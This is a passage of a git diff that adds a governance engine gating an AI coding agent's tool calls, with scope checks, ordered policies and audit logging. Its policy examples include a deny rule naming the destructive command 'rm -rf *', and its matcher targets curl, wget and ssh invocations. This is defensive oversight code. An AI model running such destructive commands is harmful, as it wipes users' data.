+// Alert on policy violations
+Bus.subscribe(Governance.Types.Event.PolicyViolation, ({ entry, policy }) => {
+  sendAlert({
+    title: "Governance Policy Violation",
+    tool: entry.tool,
+    policy: policy,
+    reason: entry.reason,
+    timestamp: entry.timestamp
+  })
+})
+```
+
+### Query Audit Logs
+
+```typescript
+import { Governance } from "./governance"
+
+// Get recent denied entries
+const denied = await Governance.Audit.list(config.audit, {
+  limit: 50,
+  outcome: "denied"
+})
+
+for (const entry of denied) {
+  console.log(`${new Date(entry.timestamp).toISOString()} - ${entry.tool}`)
+  console.log(`  Reason: ${entry.reason}`)
+  console.log(`  Policy: ${entry.policy || "scope violation"}`)
+}
+
+// Get all entries for a specific session
+const sessionLogs = await Governance.Audit.list(config.audit, {
+  sessionID: "session_abc"
+})
+```
+
+### Custom Target Classification
+
+```typescript
+import { Governance } from "./governance"
+
+// Classify a string
+const target = Governance.Matcher.classifyTarget("192.168.1.100")
+console.log(target)
+// { raw: "192.168.1.100", type: "ip", normalized: "192.168.1.100" }
+
+// Check CIDR membership
+const inRange = Governance.Matcher.ipInCidr("192.168.1.100", "192.168.0.0/16")
+console.log(inRange) // true
+
+// Extract targets from bash command
+const targets = Governance.Matcher.extractTargets("bash", {
+  command: "ssh admin@server.prod.company.com && curl https://api.example.com"
+})
+// [
+//   { raw: "server.prod.company.com", type: "domain", normalized: "server.prod.company.com" },
+//   { raw: "https://api.example.com", type: "url", normalized: "api.example.com" }
+// ]
+```
+
+---
+
+## Integration Guide
+
+### How Governance Integrates with cyxwiz
+
+The governance engine hooks into the plugin system:
+
+```
+User Request → AI generates tool call → Plugin.trigger("tool.execute.before")
+                                                      ↓
+                                              Governance.check()
+                                                      ↓
+                                         ┌───────────┴───────────┐
+                                         ↓                       ↓
+                                      Allowed                 Denied
+                                         ↓                       ↓
+                                   Execute tool         Return error message
+                                         ↓                       ↓
+                               Plugin.trigger("tool.execute.after")
+                                         ↓
+                                   Return result to AI
+```
+
+### Files Modified for Integration
+
+| File | Integration Point |
+|------|-------------------|
+| `src/plugin/index.ts` | Governance check in `trigger()` function |
+| `src/session/prompt.ts` | `GovernanceDeniedError` handling |
+| `src/config/config.ts` | Governance schema in config |
+
+### Plugin Integration (`plugin/index.ts`)
+
+```typescript
+export async function trigger(name, input, output) {
+  // Governance check before tool execution
+  if (name === "tool.execute.before") {
+    const config = await Config.get()
+    if (Governance.isEnabled(config.governance)) {
+      const result = await Governance.check(
+        {
+          tool: input.tool,
+          args: input.args,
+          sessionID: input.sessionID,
+          callID: input.callID,
+        },
+        config.governance
+      )
+
+      if (!result.allowed) {
+        throw new Governance.DeniedError(result)
+      }
+    }
+  }
+
+  // Continue with plugin hooks...
+}
+```
+
+### Error Handling (`session/prompt.ts`)
+
+```typescript
+async execute(args, options) {
+  try {
+    await Plugin.trigger("tool.execute.before", { tool, args, ... })
+  } catch (err) {
+    if (err instanceof Governance.DeniedError) {
+      return {
+        output: `[GOVERNANCE DENIED] Tool "${tool}" was blocked.
+Reason: ${err.result.reason}
+Policy: ${err.result.matchedPolicy || "scope violation"}`,
+        metadata: { governance: { denied: true, ...err.result } }
+      }
+    }
+    throw err
+  }
+
+  // Execute the tool...
+}
+```
+
+---
+
+## Troubleshooting
+
+### Common Issues
+
+#### "Governance disabled" in logs
+**Cause**: Governance is not enabled in config.
+**Solution**: Set `"enabled": true` in your governance config.
+
+#### Tools blocked unexpectedly
+**Cause**: Scope or policy rules are too restrictive.
+**Solution**:
+1. Check audit logs: `Governance.Audit.list(config.audit, { outcome: "denied" })`
+2. Review the `reason` field to understand why
+3. Adjust scope or policies accordingly
+
+#### Policies not matching as expected
+**Cause**: Policy order matters - first match wins.
+**Solution**: Place more specific policies before general ones.
+
+```jsonc
+// WRONG - general policy matches first
+{
+  "policies": [
+    { "action": "require-approval", "tools": ["bash"] },
+    { "action": "blocked", "tools": ["bash"], "commands": ["rm -rf *"] }
+  ]
+}
+
+// CORRECT - specific policy first
+{
+  "policies": [
+    { "action": "blocked", "tools": ["bash"], "commands": ["rm -rf *"] },
+    { "action": "require-approval", "tools": ["bash"] }
+  ]
+}
+```
+
+#### Targets not being extracted from bash commands
+**Cause**: The command pattern isn't recognized.
+**Solution**: The matcher looks for:
+- URLs (`http://`, `https://`)
+- IP addresses (`192.168.1.1`)
+- CIDR notation (`10.0.0.0/8`)
+- SSH patterns (`user@host`)
+- Common tool invocations (`curl`, `wget`, `ssh`, etc.)
+
+If your command uses a different pattern, the target may not be extracted.
+
+### Debug Logging
+
+Enable debug logging to see governance decisions:
+
+```typescript
+// In your config or environment
+LOG_LEVEL=debug
+```
+
+This will show:
+- Target extraction results
+- Scope check details
+- Policy matching process
+- Audit entry creation
+
+### Testing Governance
+
+```typescript
+// Test scope checking
+const targets = [
+  { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" }
+]
+const scopeResult = Governance.Scope.check(targets, {
+  ip: { allow: ["10.0.0.0/8"] }
+})
+console.log(scopeResult) // { allowed: true }
+
+// Test policy evaluation
+const policyResult = Governance.Policy.evaluate(
+  "bash",
+  { command: "ls -la" },
+  [],
+  [{ action: "auto-approve", tools: ["bash"], commands: ["ls *"] }],
+  "require-approval"
+)
+console.log(policyResult) // { action: "auto-approve", matchedPolicy: "Policy #1", ... }
+```
+
+---
+
+## Appendix
+
+### Pattern Matching Reference
+
+| Pattern | Matches | Does Not Match |
+|---------|---------|----------------|
+| `*.example.com` | `api.example.com`, `www.example.com` | `example.com` |
+| `example.com` | `example.com` | `api.example.com` |
+| `10.0.0.0/8` | `10.1.2.3`, `10.255.255.255` | `11.0.0.0` |
+| `192.168.1.0/24` | `192.168.1.1`, `192.168.1.255` | `192.168.2.1` |
+| `ssh *` | `ssh user@host`, `ssh -p 22 host` | `sshd`, `openssh` |
+| `curl *` | `curl https://api.com`, `curl -X POST` | `curling` |
+
+### Outcome Reference
+
+| Outcome | Description | Tool Executes? |
+|---------|-------------|----------------|
+| `allowed` | Auto-approved by policy | Yes |
+| `pending-approval` | Requires user permission | If user approves |
+| `denied` | Blocked by scope or policy | No |
+| `error` | Error during governance check | No |
+
+### Event Reference
+
+| Event | When Published | Payload |
+|-------|----------------|---------|
+| `governance.checked` | After every check | `{ entry: AuditEntry }` |
+| `governance.policy_violation` | When denied | `{ entry: AuditEntry, policy: string }` |
diff --git a/packages/opencode/src/governance/audit.ts b/packages/opencode/src/governance/audit.ts
new file mode 100644
index 00000000000..5715bbac4c6
--- /dev/null
+++ b/packages/opencode/src/governance/audit.ts
@@ -0,0 +1,330 @@
+/**
+ * @fileoverview Governance Audit Module
+ *
+ * This module provides comprehensive audit logging for all governance checks.
+ * Every tool execution that passes through the governance system is recorded,
+ * creating a complete audit trail for compliance, debugging, and monitoring.
+ *
+ * ## Storage Options
+ *
+ * Audit entries can be stored in two ways:
+ *
+ * - **file**: Persisted to disk via the Storage namespace (default)
+ * - **memory**: Kept in an in-memory buffer (useful for testing or ephemeral sessions)
+ *
+ * ## Event Publishing
+ *
+ * The module publishes bus events for real-time notification:
+ *
+ * - `governance.checked`: Published for every governance check
+ * - `governance.policy_violation`: Published when a tool is denied
+ *
+ * These events enable integrations like Slack alerts, metrics dashboards,
+ * or custom monitoring solutions.
+ *
+ * ## Retention
+ *
+ * For memory storage, entries are automatically pruned when exceeding
+ * MAX_MEMORY_ENTRIES (1000). File storage retention is handled externally.
+ *
+ * @module governance/audit
+ */
+
+import { GovernanceTypes } from "./types"
+import { Storage } from "../storage/storage"
+import { Instance } from "../project/instance"
+import { Bus } from "../bus"
+import { Identifier } from "../id/id"
+import { Log } from "../util/log"
+
+export namespace GovernanceAudit {
+  const log = Log.create({ service: "governance.audit" })
+
+  /**
+   * Audit configuration options.
+   *
+   * @property enabled - Whether audit logging is active (default: true)
+   * @property storage - Where to store entries: "file" or "memory" (default: "file")
+   * @property retention - Days to retain audit entries (for external cleanup)
+   * @property include_args - Whether to include tool arguments in audit entries
+   *
+   * @example
+   * ```typescript
+   * const config: AuditConfig = {
+   *   enabled: true,
+   *   storage: "file",
+   *   retention: 30,        // Keep for 30 days
+   *   include_args: false   // Don't log sensitive arguments
+   * }
+   * ```
+   */
+  export interface AuditConfig {
+    enabled?: boolean
+    storage?: "file" | "memory"
+    retention?: number
+    include_args?: boolean
+  }
+
+  /**
+   * In-memory buffer for audit entries.
+   * Used when storage = "memory" for testing or ephemeral sessions.
+   */
+  const memoryBuffer: GovernanceTypes.AuditEntry[] = []
+
+  /**
+   * Maximum number of entries to keep in memory buffer.
+   * Oldest entries are removed when this limit is exceeded.
+   */
+  const MAX_MEMORY_ENTRIES = 1000
+
+  /**
+   * Record an audit entry for a governance check.
+   *
+   * This function is called by the main governance check function after
+   * every evaluation, regardless of outcome. It:
+   *
+   * 1. Generates a unique ID and timestamp
+   * 2. Optionally strips tool arguments (based on config)
+   * 3. Stores the entry (file or memory)
+   * 4. Publishes bus events for real-time notifications
+   *
+   * @param entry - Audit entry data (without id and timestamp)
+   * @param config - Audit configuration
+   * @returns The complete audit entry with id and timestamp
+   *
+   * @example
+   * ```typescript
+   * const entry = await GovernanceAudit.record(
+   *   {
+   *     sessionID: "session_abc",
+   *     callID: "call_123",
+   *     tool: "bash",
+   *     targets: [{ raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }],
+   *     outcome: "allowed",
+   *     policy: "Allow internal network",
+   *     reason: "Matched policy: Allow internal network",
+   *     args: { command: "ping 10.0.0.1" },
+   *     duration: 5
+   *   },
+   *   { enabled: true, storage: "file", include_args: true }
+   * )
+   *
+   * console.log(entry.id)        // "tool_01ABC123..."
+   * console.log(entry.timestamp) // 1705312800000
+   * ```
+   */
+  export async function record(
+    entry: Omit<GovernanceTypes.AuditEntry, "id" | "timestamp">,
+    config: AuditConfig | undefined
+  ): Promise<GovernanceTypes.AuditEntry> {
+    // Create the complete entry with generated id and timestamp
+    const fullEntry: GovernanceTypes.AuditEntry = {
+      ...entry,
+      id: Identifier.ascending("tool"),
+      timestamp: Date.now(),
+      // Remove args if not configured to include them (privacy/security)
+      args: config?.include_args ? entry.args : undefined,
+    }
+
+    // If audit is disabled, just return the entry without storing
+    if (config?.enabled === false) {
+      log.debug("Audit logging disabled, skipping storage")
+      return fullEntry
+    }
+
+    // Store the entry based on configured storage type
+    try {
+      if (config?.storage === "memory") {
+        // Store in memory buffer with automatic pruning
+        memoryBuffer.push(fullEntry)
+        if (memoryBuffer.length > MAX_MEMORY_ENTRIES) {
+          memoryBuffer.shift() // Remove oldest entry
+        }
+        log.debug("Audit entry stored in memory", { id: fullEntry.id })
+      } else {
+        // File storage via Storage namespace
+        // Key format: ["governance", "audit", projectId, entryId]
+        const key = ["governance", "audit", Instance.project.id, fullEntry.id]
+        await Storage.write(key, fullEntry)
+        log.debug("Audit entry stored to file", { id: fullEntry.id })
+      }
+    } catch (err) {
+      // Don't fail the governance check if audit storage fails
+      log.error("Failed to write audit entry", {
+        error: err instanceof Error ? err.message : String(err),
+      })
+    }
+
+    // Publish bus events for real-time notifications
+    try {
+      // Always publish the general "checked" event
+      await Bus.publish(GovernanceTypes.Event.Checked, { entry: fullEntry })
+
+      // Publish policy violation event for denied outcomes
+      if (fullEntry.outcome === "denied") {
+        await Bus.publish(GovernanceTypes.Event.PolicyViolation, {
+          entry: fullEntry,
+          policy: fullEntry.policy || "scope-violation",
+        })
+      }
+    } catch (err) {
+      // Don't fail if event publishing fails
+      log.error("Failed to publish audit event", {
+        error: err instanceof Error ? err.message : String(err),
+      })
+    }
+
+    return fullEntry
+  }
+
+  /**
+   * List audit entries with optional filters.
+   *
+   * Retrieves audit entries from the configured storage (file or memory)
+   * with optional filtering by session ID or outcome.
+   *
+   * @param config - Audit configuration (determines storage type)
+   * @param options - Query options
+   * @param options.limit - Maximum entries to return (default: 100)
+   * @param options.sessionID - Filter by session ID
+   * @param options.outcome - Filter by outcome (allowed, denied, etc.)
+   * @returns Array of matching audit entries (most recent last)
+   *
+   * @example
+   * ```typescript
+   * // Get last 50 denied entries
+   * const denied = await GovernanceAudit.list(config, {
+   *   limit: 50,
+   *   outcome: "denied"
+   * })
+   *
+   * // Get all entries for a specific session
+   * const sessionEntries = await GovernanceAudit.list(config, {
+   *   sessionID: "session_abc"
+   * })
+   * ```
+   */
+  export async function list(
+    config: AuditConfig | undefined,
+    options?: {
+      limit?: number
+      sessionID?: string
+      outcome?: GovernanceTypes.Outcome
+    }
+  ): Promise<GovernanceTypes.AuditEntry[]> {
+    const limit = options?.limit || 100
+
+    // Memory storage - filter and return from buffer
+    if (config?.storage === "memory") {
+      let entries = [...memoryBuffer]
+
+      // Apply filters
+      if (options?.sessionID) {
+        entries = entries.filter((e) => e.sessionID === options.sessionID)
+      }
+      if (options?.outcome) {
+        entries = entries.filter((e) => e.outcome === options.outcome)
+      }
+
+      // Apply limit (take most recent)
+      return entries.slice(-limit)
+    }
+
+    // File storage - read from Storage namespace
+    try {
+      const keys = await Storage.list(["governance", "audit", Instance.project.id])
+      const entries: GovernanceTypes.AuditEntry[] = []
+
+      // Read entries (most recent first based on limit)
+      const keysToRead = keys.slice(-limit)
+
+      for (const key of keysToRead) {
+        try {
+          const entry = await Storage.read<GovernanceTypes.AuditEntry>(key)
+
+          // Apply filters
+          if (options?.sessionID && entry.sessionID !== options.sessionID) continue
+          if (options?.outcome && entry.outcome !== options.outcome) continue
+
+          entries.push(entry)
+        } catch {
+          // Skip entries that fail to read (corrupted, etc.)
+        }
+      }
+
+      return entries
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Get a single audit entry by ID.
+   *
+   * Searches both memory buffer and file storage for the entry.
+   *
+   * @param id - The audit entry ID to find
+   * @returns The audit entry if found, undefined otherwise
+   *
+   * @example
+   * ```typescript
+   * const entry = await GovernanceAudit.get("tool_01ABC123")
+   * if (entry) {
+   *   console.log(`Tool ${entry.tool} was ${entry.outcome}`)
+   * }
+   * ```
+   */
+  export async function get(id: string): Promise<GovernanceTypes.AuditEntry | undefined> {
+    // Check memory buffer first (faster)
+    const memoryEntry = memoryBuffer.find((e) => e.id === id)
+    if (memoryEntry) return memoryEntry
+
+    // Try file storage
+    try {
+      const keys = await Storage.list(["governance", "audit", Instance.project.id])
+      const matchingKey = keys.find((k) => k[k.length - 1] === id)
+      if (matchingKey) {
+        return await Storage.read<GovernanceTypes.AuditEntry>(matchingKey)
+      }
+    } catch {
+      // Entry not found in file storage
+    }
+
+    return undefined
+  }
+
+  /**
+   * Clear all audit entries from memory buffer.
+   *
+   * Useful for testing or resetting state. Only affects memory storage,
+   * not file-based entries.
+   *
+   * @example
+   * ```typescript
+   * // In tests
+   * beforeEach(() => {
+   *   GovernanceAudit.clearMemory()
+   * })
+   * ```
+   */
+  export function clearMemory(): void {
+    memoryBuffer.length = 0
+  }
+
+  /**
+   * Get the count of audit entries in memory buffer.
+   *
+   * Useful for testing or monitoring memory usage.
+   *
+   * @returns Number of entries currently in memory
+   *
+   * @example
+   * ```typescript
+   * const count = GovernanceAudit.memoryCount()
+   * console.log(`${count} entries in memory`)
+   * ```
+   */
+  export function memoryCount(): number {
+    return memoryBuffer.length
+  }
+}
diff --git a/packages/opencode/src/governance/index.ts b/packages/opencode/src/governance/index.ts
new file mode 100644
index 00000000000..7d17a1addba
--- /dev/null
+++ b/packages/opencode/src/governance/index.ts
@@ -0,0 +1,427 @@
+/**
+ * @fileoverview Governance Engine - Main Entry Point
+ *
+ * The Governance Engine provides comprehensive control over tool executions
+ * in cyxwiz. It enforces scope restrictions, policy-based rules, and
+ * comprehensive audit logging for all AI tool operations.
+ *
+ * ## Architecture Overview
+ *
+ * ```
+ * ┌─────────────────────────────────────────────────────────────────┐
+ * │                     Tool Execution Request                      │
+ * └─────────────────────────────────────────────────────────────────┘
+ *                                 │
+ *                                 ▼
+ * ┌─────────────────────────────────────────────────────────────────┐
+ * │                    Governance.check()                           │
+ * │  ┌─────────────┐  ┌─────────────┐  ┌─────────────┐             │
+ * │  │   Matcher   │→ │    Scope    │→ │   Policy    │             │
+ * │  │  (extract)  │  │  (enforce)  │  │ (evaluate)  │             │
+ * │  └─────────────┘  └─────────────┘  └─────────────┘             │
+ * │                          │                │                     │
+ * │                          ▼                ▼                     │
+ * │                    ┌─────────────────────────┐                  │
+ * │                    │         Audit           │                  │
+ * │                    │   (record & publish)    │                  │
+ * │                    └─────────────────────────┘                  │
+ * └─────────────────────────────────────────────────────────────────┘
+ *                                 │
+ *                                 ▼
+ *              ┌──────────────────┴──────────────────┐
+ *              │                                     │
+ *        ┌─────▼─────┐                        ┌─────▼─────┐
+ *        │  Allowed  │                        │  Denied   │
+ *        │(proceed)  │                        │(DeniedErr)│
+ *        └───────────┘                        └───────────┘
+ * ```
+ *
+ * ## Execution Flow
+ *
+ * 1. **Target Extraction** (Matcher): Analyze tool arguments for network targets
+ * 2. **Scope Check** (Scope): Verify targets are within allowed IP/domain ranges
+ * 3. **Policy Evaluation** (Policy): Match against policy rules for action
+ * 4. **Audit Logging** (Audit): Record the check result and publish events
+ * 5. **Result**: Allow execution, require approval, or throw DeniedError
+ *
+ * ## Integration
+ *
+ * The governance engine integrates with the plugin system via the
+ * `tool.execute.before` hook. When governance denies a tool, it throws
+ * `Governance.DeniedError` which is caught and handled gracefully by
+ * the session prompt handler.
+ *
+ * ## Configuration
+ *
+ * Governance is configured in the project's `opencode.jsonc` file:
+ *
+ * ```jsonc
+ * {
+ *   "governance": {
+ *     "enabled": true,
+ *     "scope": { ... },
+ *     "policies": [ ... ],
+ *     "default_action": "require-approval",
+ *     "audit": { ... }
+ *   }
+ * }
+ * ```
+ *
+ * @module governance
+ *
+ * @example
+ * ```typescript
+ * import { Governance } from "./governance"
+ *
+ * // Check if a tool execution is allowed
+ * const result = await Governance.check(
+ *   {
+ *     sessionID: "session_abc",
+ *     callID: "call_123",
+ *     tool: "bash",
+ *     args: { command: "curl https://api.example.com" }
+ *   },
+ *   config.governance
+ * )
+ *
+ * if (!result.allowed) {
+ *   throw new Governance.DeniedError(result)
+ * }
+ * ```
+ */
+
+import { GovernanceTypes } from "./types"
+import { GovernanceScope } from "./scope"
+import { GovernancePolicy } from "./policy"
+import { GovernanceAudit } from "./audit"
+import { GovernanceMatcher } from "./matcher"
+import { Log } from "../util/log"
+
+export namespace Governance {
+  const log = Log.create({ service: "governance" })
+
+  // ============================================================================
+  // Re-exports for convenient access
+  // ============================================================================
+
+  /**
+   * Re-export of GovernanceTypes namespace.
+   * Contains all type definitions, Zod schemas, and bus events.
+   *
+   * @see {@link GovernanceTypes}
+   */
+  export import Types = GovernanceTypes
+
+  /**
+   * Re-export of GovernanceScope namespace.
+   * Contains scope checking functionality for IP/domain restrictions.
+   *
+   * @see {@link GovernanceScope}
+   */
+  export import Scope = GovernanceScope
+
+  /**
+   * Re-export of GovernancePolicy namespace.
+   * Contains policy evaluation functionality.
+   *
+   * @see {@link GovernancePolicy}
+   */
+  export import Policy = GovernancePolicy
+
+  /**
+   * Re-export of GovernanceAudit namespace.
+   * Contains audit logging functionality.
+   *
+   * @see {@link GovernanceAudit}
+   */
+  export import Audit = GovernanceAudit
+
+  /**
+   * Re-export of GovernanceMatcher namespace.
+   * Contains target extraction and matching utilities.
+   *
+   * @see {@link GovernanceMatcher}
+   */
+  export import Matcher = GovernanceMatcher
+
+  // ============================================================================
+  // Configuration
+  // ============================================================================
+
+  /**
+   * Governance configuration structure.
+   *
+   * This interface mirrors the governance section in the Config schema.
+   * All fields are optional - governance is disabled by default.
+   *
+   * @property enabled - Master switch for governance (default: false)
+   * @property scope - IP and domain allow/deny lists
+   * @property policies - Array of policy rules (order matters!)
+   * @property default_action - Action when no policy matches (default: require-approval)
+   * @property audit - Audit logging configuration
+   *
+   * @example
+   * ```typescript
+   * const config: Governance.Config = {
+   *   enabled: true,
+   *   scope: {
+   *     ip: { allow: ["10.0.0.0/8"] },
+   *     domain: { deny: ["*.prod.*"] }
+   *   },
+   *   policies: [
+   *     { action: "auto-approve", tools: ["read", "glob", "grep"] },
+   *     { action: "blocked", tools: ["bash"], commands: ["rm -rf *"] }
+   *   ],
+   *   default_action: "require-approval",
+   *   audit: { enabled: true, storage: "file" }
+   * }
+   * ```
+   */
+  export interface Config {
+    enabled?: boolean
+    scope?: GovernanceScope.ScopeConfig
+    policies?: GovernancePolicy.PolicyConfig[]
+    default_action?: GovernancePolicy.PolicyAction
+    audit?: GovernanceAudit.AuditConfig
+  }
+
+  // ============================================================================
+  // Core Functions
+  // ============================================================================
+
+  /**
+   * Check if governance is enabled in the given config.
+   *
+   * Governance must be explicitly enabled - it's off by default.
+   *
+   * @param config - Governance configuration
+   * @returns true if governance is enabled
+   *
+   * @example
+   * ```typescript
+   * if (Governance.isEnabled(config.governance)) {
+   *   // Run governance checks
+   * }
+   * ```
+   */
+  export function isEnabled(config: Config | undefined): boolean {
+    return config?.enabled === true
+  }
+
+  /**
+   * Main governance check function.
+   *
+   * This is the primary entry point for all governance checks. It orchestrates
+   * the full governance pipeline:
+   *
+   * 1. **Early exit**: If governance is disabled, allow immediately
+   * 2. **Target extraction**: Analyze tool arguments for network targets
+   * 3. **Scope check**: Verify targets are within allowed ranges
+   * 4. **Policy evaluation**: Match against policy rules
+   * 5. **Audit logging**: Record the result and publish events
+   *
+   * Called by the plugin system before tool execution (`tool.execute.before` hook).
+   *
+   * @param request - The governance check request
+   * @param request.sessionID - Current session ID
+   * @param request.callID - Unique tool call ID
+   * @param request.tool - Name of the tool being executed
+   * @param request.args - Tool arguments to analyze
+   * @param config - Governance configuration
+   * @returns Check result with allowed status, outcome, and metadata
+   *
+   * @example
+   * ```typescript
+   * const result = await Governance.check(
+   *   {
+   *     sessionID: "session_abc",
+   *     callID: "call_123",
+   *     tool: "bash",
+   *     args: { command: "ssh user@prod.example.com" }
+   *   },
+   *   config.governance
+   * )
+   *
+   * if (!result.allowed) {
+   *   console.log(`Blocked: ${result.reason}`)
+   *   // result.outcome === "denied"
+   *   // result.matchedPolicy === "Block SSH to production"
+   * }
+   * ```
+   */
+  export async function check(
+    request: GovernanceTypes.CheckRequest,
+    config: Config | undefined
+  ): Promise<GovernanceTypes.CheckResult> {
+    // If governance is disabled, allow everything
+    if (!isEnabled(config)) {
+      return {
+        allowed: true,
+        outcome: "allowed",
+        targets: [],
+        reason: "Governance disabled",
+      }
+    }
+
+    const startTime = Date.now()
+
+    // Step 1: Extract network targets from tool arguments
+    const targets = GovernanceMatcher.extractTargets(request.tool, request.args)
+
+    log.info("Governance check", {
+      tool: request.tool,
+      targetCount: targets.length,
+      targets: targets.map((t) => t.normalized),
+    })
+
+    // Step 2: Check scope restrictions (IP/domain allow/deny lists)
+    const scopeResult = GovernanceScope.check(targets, config!.scope)
+    if (!scopeResult.allowed) {
+      const result: GovernanceTypes.CheckResult = {
+        allowed: false,
+        outcome: "denied",
+        targets,
+        reason: scopeResult.reason,
+      }
+
+      // Record audit entry for the denial
+      await GovernanceAudit.record(
+        {
+          sessionID: request.sessionID,
+          callID: request.callID,
+          tool: request.tool,
+          targets,
+          outcome: "denied",
+          reason: scopeResult.reason,
+          args: request.args,
+          duration: Date.now() - startTime,
+        },
+        config!.audit
+      )
+
+      log.warn("Governance denied (scope violation)", {
+        tool: request.tool,
+        reason: scopeResult.reason,
+      })
+
+      return result
+    }
+
+    // Step 3: Evaluate policies to determine action
+    const policyResult = GovernancePolicy.evaluate(
+      request.tool,
+      request.args,
+      targets,
+      config!.policies,
+      config!.default_action || "require-approval"
+    )
+
+    // Step 4: Determine outcome based on policy action
+    let outcome: GovernanceTypes.Outcome
+    let allowed: boolean
+
+    switch (policyResult.action) {
+      case "auto-approve":
+        // Tool can proceed without user confirmation
+        outcome = "allowed"
+        allowed = true
+        break
+      case "blocked":
+        // Tool is explicitly blocked
+        outcome = "denied"
+        allowed = false
+        break
+      case "require-approval":
+        // Defer to existing permission system for user approval
+        outcome = "pending-approval"
+        allowed = true
+        break
+    }
+
+    // Step 5: Record audit entry
+    await GovernanceAudit.record(
+      {
+        sessionID: request.sessionID,
+        callID: request.callID,
+        tool: request.tool,
+        targets,
+        outcome,
+        policy: policyResult.matchedPolicy,
+        reason: policyResult.reason,
+        args: request.args,
+        duration: Date.now() - startTime,
+      },
+      config!.audit
+    )
+
+    // Log the result
+    if (!allowed) {
+      log.warn("Governance denied (policy blocked)", {
+        tool: request.tool,
+        policy: policyResult.matchedPolicy,
+        reason: policyResult.reason,
+      })
+    } else {
+      log.info("Governance result", {
+        tool: request.tool,
+        outcome,
+        policy: policyResult.matchedPolicy,
+      })
+    }
+
+    return {
+      allowed,
+      outcome,
+      targets,
+      matchedPolicy: policyResult.matchedPolicy,
+      reason: policyResult.reason,
+    }
+  }
+
+  // ============================================================================
+  // Error Handling
+  // ============================================================================
+
+  /**
+   * Error thrown when governance denies a tool execution.
+   *
+   * This error is thrown by the plugin trigger function when a governance
+   * check returns `allowed: false`. It's caught by the session prompt
+   * handler and converted to a user-friendly message.
+   *
+   * @property result - The full governance check result with details
+   *
+   * @example
+   * ```typescript
+   * const result = await Governance.check(request, config)
+   *
+   * if (!result.allowed) {
+   *   throw new Governance.DeniedError(result)
+   * }
+   *
+   * // Catching the error
+   * try {
+   *   await Plugin.trigger("tool.execute.before", input, output)
+   * } catch (err) {
+   *   if (err instanceof Governance.DeniedError) {
+   *     return {
+   *       output: `Blocked by governance: ${err.result.reason}`,
+   *       metadata: { governance: err.result }
+   *     }
+   *   }
+   *   throw err
+   * }
+   * ```
+   */
+  export class DeniedError extends Error {
+    /**
+     * Create a new DeniedError.
+     *
+     * @param result - The governance check result that caused the denial
+     */
+    constructor(public readonly result: GovernanceTypes.CheckResult) {
+      super(`Governance denied: ${result.reason}`)
+      this.name = "GovernanceDeniedError"
+    }
+  }
+}
diff --git a/packages/opencode/src/governance/matcher.ts b/packages/opencode/src/governance/matcher.ts
new file mode 100644
index 00000000000..1012a112400
--- /dev/null
+++ b/packages/opencode/src/governance/matcher.ts
@@ -0,0 +1,394 @@
+/**
+ * @fileoverview Governance Matcher Module
+ *
+ * This module is responsible for extracting and classifying network targets
+ * from tool arguments. It analyzes tool inputs to identify potential network
+ * endpoints (IPs, CIDRs, domains, URLs) that governance policies can then
+ * evaluate.
+ *
+ * ## Target Extraction
+ *
+ * The matcher extracts targets differently based on tool type:
+ *
+ * - **bash**: Analyzes command strings for URLs, IPs, SSH patterns, and
+ *   common networking tool invocations (curl, wget, ssh, etc.)
+ * - **webfetch**: Extracts the URL argument directly
+ * - **websearch**: No network targets (search queries don't target specific hosts)
+ * - **Other tools**: Scans all string argument values for recognizable patterns
+ *
+ * ## Target Classification
+ *
+ * Each extracted string is classified into one of:
+ * - `ip`: IPv4 address (e.g., "192.168.1.1")
+ * - `cidr`: CIDR notation (e.g., "10.0.0.0/8")
+ * - `domain`: Domain name (e.g., "example.com")
+ * - `url`: Full URL (e.g., "https://example.com/path")
+ * - `unknown`: Could not be classified
+ *
+ * ## Pattern Matching
+ *
+ * The module provides matching functions for governance checks:
+ * - CIDR matching for IP addresses against network ranges
+ * - Wildcard/glob matching for domain patterns (e.g., "*.example.com")
+ *
+ * @module governance/matcher
+ */
+
+import { GovernanceTypes } from "./types"
+import { Wildcard } from "../util/wildcard"
+import { Log } from "../util/log"
+
+export namespace GovernanceMatcher {
+  const log = Log.create({ service: "governance.matcher" })
+
+  /**
+   * Regular expression for matching IPv4 addresses.
+   * Matches four octets separated by dots (e.g., "192.168.1.1").
+   * Note: Does not validate octet values (0-255), that's done separately.
+   */
+  const IPV4_REGEX = /^(\d{1,3}\.){3}\d{1,3}$/
+
+  /**
+   * Regular expression for matching CIDR notation.
+   * Matches IPv4 address followed by /prefix (e.g., "10.0.0.0/8").
+   * Note: Does not validate prefix length (0-32), that's done separately.
+   */
+  const CIDR_REGEX = /^(\d{1,3}\.){3}\d{1,3}\/\d{1,2}$/
+
+  /**
+   * Regular expression for matching domain names.
+   * Allows alphanumeric characters, hyphens, and multiple subdomains.
+   * Simplified pattern that covers most valid domain names.
+   */
+  const DOMAIN_REGEX = /^[a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?)*$/
+
+  /**
+   * Classify a string as IP, CIDR, domain, URL, or unknown.
+   *
+   * Classification order:
+   * 1. Try to parse as URL (most specific)
+   * 2. Check for CIDR notation
+   * 3. Check for IPv4 address
+   * 4. Check for domain name
+   * 5. Fall back to unknown
+   *
+   * @param raw - The raw string to classify
+   * @returns A Target object with type and normalized form
+   *
+   * @example
+   * ```typescript
+   * // URL classification
+   * classifyTarget("https://api.example.com/v1")
+   * // => { raw: "https://api.example.com/v1", type: "url", normalized: "api.example.com" }
+   *
+   * // IP classification
+   * classifyTarget("192.168.1.1")
+   * // => { raw: "192.168.1.1", type: "ip", normalized: "192.168.1.1" }
+   *
+   * // CIDR classification
+   * classifyTarget("10.0.0.0/8")
+   * // => { raw: "10.0.0.0/8", type: "cidr", normalized: "10.0.0.0/8" }
+   *
+   * // Domain classification
+   * classifyTarget("example.com")
+   * // => { raw: "example.com", type: "domain", normalized: "example.com" }
+   * ```
+   */
+  export function classifyTarget(raw: string): GovernanceTypes.Target {
+    const trimmed = raw.trim()
+
+    // Check if URL and extract hostname
+    try {
+      const url = new URL(trimmed)
+      return {
+        raw: trimmed,
+        type: "url",
+        normalized: url.hostname.toLowerCase(),
+      }
+    } catch {
+      // Not a valid URL, continue checking
+    }
+
+    // Check CIDR first (before IP since CIDR contains IP)
+    if (CIDR_REGEX.test(trimmed)) {
+      return { raw: trimmed, type: "cidr", normalized: trimmed }
+    }
+
+    // Check IP
+    if (IPV4_REGEX.test(trimmed)) {
+      // Validate each octet is 0-255
